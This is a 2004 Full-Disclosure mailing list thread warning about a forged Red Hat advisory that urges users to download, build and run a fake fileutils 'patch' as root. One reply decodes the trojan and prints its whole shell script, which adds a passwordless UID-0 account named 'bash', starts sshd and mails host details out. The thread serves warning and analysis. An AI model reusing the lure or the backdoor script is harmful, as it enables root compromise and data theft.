[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
-BEGIN PGP SIGNED MESSAGE- Be advised. The message below is currently going around on internet. Being unsinged was the fist obvious issue. Not pointing to RPM updates, being in a different format and such were among the other reasong to suspect it. Message was send from 'University of Texas at Arlington'. I am sure none of you should be fooled by such a message but other might be. And while it lasts you may want to get the file for your own educational purposes. Hugo. - -- Forwarded message -- Date: Sun, 24 Oct 2004 17:22:20 -0500 From: RedHat Security Team <[EMAIL PROTECTED]> To: * Subject: RedHat: Buffer Overflow in "ls" and "mkdir" [logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: * First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz * cd fileutils-1.0.6.patch * make * ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team. Copyright (C) 2004 Red Hat, Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7 OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL fcdKycT5D9E= =/nEk -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
Hello, Read these: http://www.redhat.com/security/ http://www.f-secure.com/weblog/#0323 >The message below is currently going around on internet. >Being unsinged was the fist obvious issue. Do you really expect a singing security alert from RedHat? I think the all singing, all dancing security bulletins are a M$ specialty. Regards: Tamas Feher. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
haha, that's pretty funny. If they were going to do something like that it should have at least been in a rpm format. I'm hoping that this doesn't need to be said but if neither "yum check-update || up2date -l" report anything then chances are there are no "Official Fedora Updates" --Harry Hugo van der Kooij wrote: -BEGIN PGP SIGNED MESSAGE- Be advised. The message below is currently going around on internet. Being unsinged was the fist obvious issue. Not pointing to RPM updates, being in a different format and such were among the other reasong to suspect it. Message was send from 'University of Texas at Arlington'. I am sure none of you should be fooled by such a message but other might be. And while it lasts you may want to get the file for your own educational purposes. Hugo. - -- Forwarded message -- Date: Sun, 24 Oct 2004 17:22:20 -0500 From: RedHat Security Team <[EMAIL PROTECTED]> To: * Subject: RedHat: Buffer Overflow in "ls" and "mkdir" [logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: * First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz * cd fileutils-1.0.6.patch * make * ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team. Copyright (C) 2004 Red Hat, Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7 OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL fcdKycT5D9E= =/nEk -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
Hugo van der Kooij wrote:
Be advised.
The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.
Message was send from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but other
might
be.
And while it lasts you may want to get the file for your own
educational
purposes.
I did a quickie analysis of the program (which is basically just
distributed as source!).
Strings are encrypted with arcfour; however, as the keys are included
too, decrypting them is no problem.
pswd[] is an initialization vector for arcfour.
shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$@"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR
opts[], text[], and chk2[] are encrypted with some (apparently
constant) data retrieved by statting /bin/sh.
To cut to the chase, the whole thing ends up clearing the screen and
running the following shell script:
#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and you are:
\"`whoami`\""
exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please
wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" [EMAIL PROTECTED] >>
/dev/null
rm -rf /tmp/mama
mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi
bla()
{
sleep 2
echo -n "#"
sleep 1
echo -n "#"
sleep 1
echo -n "#"
sleep 2
echo -n "#"
sleep 1
echo -n "#"
sleep 1
echo -n "#"
sleep 3
echo -n "#"
sleep 1
echo -n "#"
sleep 4
echo -n "#"
sleep 1
echo -n "#"
sleep 1
echo "#"
sleep 1
}
echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these
files."
sleep 1
PGP.sig
Description: This is a digitally signed message part
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote: > haha, that's pretty funny. If they were going to do something like that > it should have at least been in a rpm format. Considering you can put an executable script inside, if I remember right. > I'm hoping that this doesn't need to be said but if neither > "yum check-update || up2date -l" report anything then chances are there > are no "Official Fedora Updates" > > --Harry > > > > Hugo van der Kooij wrote: > >-BEGIN PGP SIGNED MESSAGE- > > > >Be advised. > > > >The message below is currently going around on internet. Being unsinged > >was the fist obvious issue. Not pointing to RPM updates, being in a > >different format and such were among the other reasong to suspect it. > > > >Message was send from 'University of Texas at Arlington'. > > > >I am sure none of you should be fooled by such a message but other might > >be. > > > >And while it lasts you may want to get the file for your own educational > >purposes. > > > >Hugo. > >- -- Forwarded message -- > >Date: Sun, 24 Oct 2004 17:22:20 -0500 > >From: RedHat Security Team <[EMAIL PROTECTED]> > >To: * > >Subject: RedHat: Buffer Overflow in "ls" and "mkdir" > > > > > >[logo_rh_home.png] > > > >Original issue date: October 20, 2004 > >Last revised: October 20, 2004 > >Source: RedHat > > > >A complete revision history is at the end of this file. > > > >Dear RedHat user, > > > >Redhat found a vulnerability in fileutils (ls and mkdir), that could > >allow a remote attacker to execute arbitrary code with root privileges. > >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, > >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is > >known that *BSD and Solaris platforms are NOT affected. > > > >The RedHat Security Team strongly advises you to immediately apply the > >fileutils-1.0.6 patch. This is a critical-critical update that you must > >make by following these steps: > > > > * First download the patch from the Security RedHat mirror: wget > >www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz > > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz > > * cd fileutils-1.0.6.patch > > * make > > * ./inst > > > >Again, please apply this patch as soon as possible or you risk your > >system and others` to be compromised. > > > >Thank you for your prompt attention to this serious matter, > > > >RedHat Security Team. > > > >Copyright (C) 2004 Red Hat, Inc. All rights reserved. > > > > > >-BEGIN PGP SIGNATURE- > >Version: GnuPG v1.2.3 (GNU/Linux) > > > >iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7 > >OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo > >H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL > >fcdKycT5D9E= > >=/nEk > >-END PGP SIGNATURE- > > > >___ > >Full-Disclosure - We believe in it. > >Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html -- Vincent ARCHER [EMAIL PROTECTED] Tel : +33 (0)1 40 07 47 14 Fax : +33 (0)1 40 07 47 27 Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
The k-otik folks have an analysis of the bad things that might happen if you follow the instructions in the fake RedHat advisory that was reported in yesterday's diary: http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt the source code is also there Steph --- Brett Campbell <[EMAIL PROTECTED]> wrote: > On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew > Farmer wrote: > > > I did a quickie analysis of the program (which is > basically just > > distributed as source!). > > > when did you get a hold of the tarball? they must've > yanked the record > for www.fedora-redhat.com ... it can't be resolved > in any way. > > pretty interesting (and pathetic) anyways, nice > detective work. > > -- > [ Brett R. Campbell ] > -> Configuration Management / Systems > Administration > -> Collaborative Agent Design Research Center > -> California Polytechnic State University, SLO, CA > __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote: > I did a quickie analysis of the program (which is basically just > distributed as source!). when did you get a hold of the tarball? they must've yanked the record for www.fedora-redhat.com ... it can't be resolved in any way. pretty interesting (and pathetic) anyways, nice detective work. -- [ Brett R. Campbell ] -> Configuration Management / Systems Administration -> Collaborative Agent Design Research Center -> California Polytechnic State University, SLO, CA http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
